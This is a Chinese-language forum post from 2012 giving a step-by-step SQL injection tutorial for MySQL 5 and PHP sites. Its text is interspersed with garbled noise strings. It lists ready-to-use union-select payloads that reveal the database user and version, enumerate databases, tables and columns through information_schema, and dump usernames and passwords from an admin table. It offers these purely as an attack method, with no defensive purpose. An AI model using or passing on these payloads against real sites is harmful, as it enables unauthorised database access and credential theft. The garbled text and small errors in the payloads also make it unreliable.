" B! H& P) v8 u5 E- m7 J) _教程内容:Mysql 5+php 注入
9 g2 m; @$ V* D2 ]* h' H C1 X' r, n3 z
2 v6 G* b0 S. R A$ Y
/ k, z. Q9 \- a4 T$ N一.查看MYSQL基本信息(库名,版本,用户)
% `& m( M9 `) O1 d- q p3 W" k0 z/ q- r- g
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*: L1 F. f/ E q; Q
7 E+ @. D& q3 |# X2 p
二.查数据库
, V& o7 o0 X; {+ x' ^9 W
' {" _* Q+ z' R$ ~8 band 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*1 e. j! v3 `/ g1 V. q- L+ y
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。0 r" v' f, K s3 C
5 D x% ^) y7 a% X* C1 s! F- n) w三.暴表
7 ]" f3 H; c) r6 b: _
2 u6 F! w7 t1 n/ t) Xand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
; o) w( L( E W3 A$ x
& Z, h) }+ d& p4 {! E( H1 t. nlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。* l3 Q, W3 ?! P( N' e1 m
8 o4 q1 P9 S& I; G3 o
四.暴字段* \6 g% T5 J0 |1 N
7 ?2 [% N. w/ U
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*- W1 W" U: s2 g
- J2 R1 o3 O3 z; w F Y" vlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
* \1 f# o, m0 C+ s2 n ?5 S4 |- t# p5 a+ d* A. ?* r
五.暴数据2 [1 e* g8 I' x1 i7 e, i
) v& W* C. \! o- ]2 e' l kand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*9 k; e! v- q0 e0 M/ o
2 U# M% I0 x. _; p; J) v
7 |1 W7 D3 V: c0 i
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。! O: K! r3 u; M- m& w1 |/ q
|
发表于 2012-9-13 16:27:53
收藏
支持
反对